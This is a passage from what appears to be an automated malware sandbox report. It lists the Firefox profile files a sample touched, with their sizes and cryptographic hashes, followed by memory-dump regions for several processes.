                    1b41c2c3b1dea23e3da0c61c2f8a49fa74945739df331ce976257912694bf7a8

                    SHA512

                    0f9d9bca31ffe20906cfc914d2f644605f13ff59a74a61242df500f5020565aa925c977ace906f5c8889b1e70eb577677260440e27c807355e024d0734f79d04

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\99fc8ab0-685a-495b-be6e-61f5d8135853

                    Filesize

                    12KB

                    MD5

                    176da93def6bdfc1332c9f2523556d13

                    SHA1

                    da5097160a71ccd1753985e2f5643eedb88c32e0

                    SHA256

                    fb6c77b7b00e54444a8154639912c4ec23d0423342046c7d79cd475eb6e9c0cd

                    SHA512

                    c0774dbd57af5e8214e3afbb0c1439b39c989f46f125bc809989e143e2fd9bd996bb394d3d960527216796cf0dc1ac21172a4117fe8c5fae35d70603615be9c2

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                    Filesize

                    997KB

                    MD5

                    fe3355639648c417e8307c6d051e3e37

                    SHA1

                    f54602d4b4778da21bc97c7238fc66aa68c8ee34

                    SHA256

                    1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                    SHA512

                    8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                    Filesize

                    116B

                    MD5

                    3d33cdc0b3d281e67dd52e14435dd04f

                    SHA1

                    4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                    SHA256

                    f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                    SHA512

                    a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                    Filesize

                    479B

                    MD5

                    49ddb419d96dceb9069018535fb2e2fc

                    SHA1

                    62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                    SHA256

                    2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                    SHA512

                    48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

                    Filesize

                    372B

                    MD5

                    8be33af717bb1b67fbd61c3f4b807e9e

                    SHA1

                    7cf17656d174d951957ff36810e874a134dd49e0

                    SHA256

                    e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                    SHA512

                    6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                    Filesize

                    11.8MB

                    MD5

                    33bf7b0439480effb9fb212efce87b13

                    SHA1

                    cee50f2745edc6dc291887b6075ca64d716f495a

                    SHA256

                    8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                    SHA512

                    d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                    Filesize

                    1KB

                    MD5

                    688bed3676d2104e7f17ae1cd2c59404

                    SHA1

                    952b2cdf783ac72fcb98338723e9afd38d47ad8e

                    SHA256

                    33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                    SHA512

                    7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                    Filesize

                    1KB

                    MD5

                    937326fead5fd401f6cca9118bd9ade9

                    SHA1

                    4526a57d4ae14ed29b37632c72aef3c408189d91

                    SHA256

                    68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

                    SHA512

                    b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                    Filesize

                    6KB

                    MD5

                    6f20b1d9657531a9fbb7a77d37936199

                    SHA1

                    ce4b0eb42cc6cc2bbe5eb334bebc75c5685cffbc

                    SHA256

                    2b9dd2283e93a62029e43ee8f930e6c5d10641dc877206f97ebe2ab9038fba3e

                    SHA512

                    4ef551071639b5190a41009d1224da7be7f71aef50fa901d1d4b825eca156308a8eaaa839fb5329873f3ca0739099cce95800919af2f508da5fdc4f1f0b104ab

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                    Filesize

                    7KB

                    MD5

                    d3a62a77031e86ac8bf2320330305c05

                    SHA1

                    acc89b0adc68779f2ce8c0357d385396a2be49ec

                    SHA256

                    0930914de46e93424525e2bdb430a21e67452a9aeccbbfb5b560a638edca3ca5

                    SHA512

                    af2e47f480b9e74c5d7e53fe1f2264fd5a2b83fd974343ef96d1541294bb72dba98d12820be1fc6c742243e5b3602558dcc16604dd9d801a2877aaf4131fa0f6

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs.js

                    Filesize

                    6KB

                    MD5

                    14702774e53c64d7bfee5dc67ca24b2f

                    SHA1

                    31d2c9a0717a4747dbdc88da9421350781ede382

                    SHA256

                    fd156a3827d5463a093aa11b95f26269a356eb79e0006d26dc67d78b6336d0ca

                    SHA512

                    c76ff3d79d9271b10c516cf1fc5ffeae7bb0fafc0280dab123174f6341f9f68a4e72550b8872fe6a4ba54735521880383ad1cef886c619ba666cd5f0cfcec38b

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4

                    Filesize

                    4KB

                    MD5

                    2d51833052dc89054327529a2ea36023

                    SHA1

                    b0c06356af6cf9ce1f85577504c34e515d0f1abd

                    SHA256

                    dcc511bf10f44c31bee2d60abf52945933b1fe88391ec7cf90ba0789a4f57e8a

                    SHA512

                    b6b4895e35111911492210fb332b0b67f5155a09750346bae2021958ca135625070475cf5ac528f0ddb50d90cef0d17adac0a2ef980998b4fb7e7d665324c196

                  • memory/684-2646-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/684-2650-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/684-2652-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/684-2720-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/684-2729-0x00000000009B0000-0x0000000000C74000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/904-68-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-56-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-96-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-94-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-92-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-90-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-112-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-110-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-108-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-86-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-84-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-76-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-74-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-73-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-62-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-60-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-58-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-82-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-80-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-78-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-66-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-55-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-1232-0x00000000022D0000-0x000000000231C000-memory.dmp

                    Filesize

                    304KB

                  • memory/904-1231-0x0000000005510000-0x000000000567E000-memory.dmp

                    Filesize

                    1.4MB

                  • memory/904-100-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-88-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-2712-0x00000000023F0000-0x0000000002444000-memory.dmp

                    Filesize

                    336KB

                  • memory/904-102-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-64-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-104-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-52-0x00000000002E0000-0x000000000053E000-memory.dmp

                    Filesize

                    2.4MB

                  • memory/904-98-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-70-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-106-0x0000000004F40000-0x0000000005138000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/904-53-0x0000000004F40000-0x000000000513E000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/1152-2481-0x00000000001A0000-0x0000000000648000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/1152-2478-0x00000000001A0000-0x0000000000648000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/1592-1287-0x0000000000EF0000-0x000000000114E000-memory.dmp

                    Filesize

                    2.4MB

                  • memory/1592-2816-0x0000000000CD0000-0x0000000000D24000-memory.dmp

                    Filesize

                    336KB

                  • memory/2756-2497-0x00000000067F0000-0x0000000006E7B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2756-22-0x0000000000FB1000-0x0000000001019000-memory.dmp

                    Filesize

                    416KB

                  • memory/2756-1244-0x00000000067F0000-0x0000000006C9C000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2756-20-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-54-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-2498-0x00000000067F0000-0x0000000006E7B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2756-2643-0x00000000067F0000-0x0000000006E7B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2756-2474-0x00000000067F0000-0x0000000006C98000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2756-33-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-2645-0x00000000062F0000-0x00000000065B4000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/2756-2644-0x00000000062F0000-0x00000000065B4000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/2756-32-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-31-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-29-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-28-0x0000000000FB1000-0x0000000001019000-memory.dmp

                    Filesize

                    416KB

                  • memory/2756-23-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-2718-0x00000000062F0000-0x00000000065B4000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/2756-2719-0x00000000062F0000-0x00000000065B4000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/2756-27-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-26-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2756-25-0x0000000000FB0000-0x00000000012C4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-21-0x0000000000931000-0x0000000000999000-memory.dmp

                    Filesize

                    416KB

                  • memory/3064-18-0x00000000066D0000-0x00000000069E4000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-17-0x0000000000930000-0x0000000000C44000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-5-0x0000000000930000-0x0000000000C44000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-3-0x0000000000930000-0x0000000000C44000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3064-2-0x0000000000931000-0x0000000000999000-memory.dmp

                    Filesize

                    416KB

                  • memory/3064-1-0x0000000077160000-0x0000000077162000-memory.dmp

                    Filesize

                    8KB

                  • memory/3064-0-0x0000000000930000-0x0000000000C44000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/3396-2502-0x0000000000B80000-0x000000000120B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/3396-2500-0x0000000000B80000-0x000000000120B000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/4900-1250-0x0000000000940000-0x0000000000DEC000-memory.dmp

                    Filesize

                    4.7MB

                  We care about your privacy.

                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.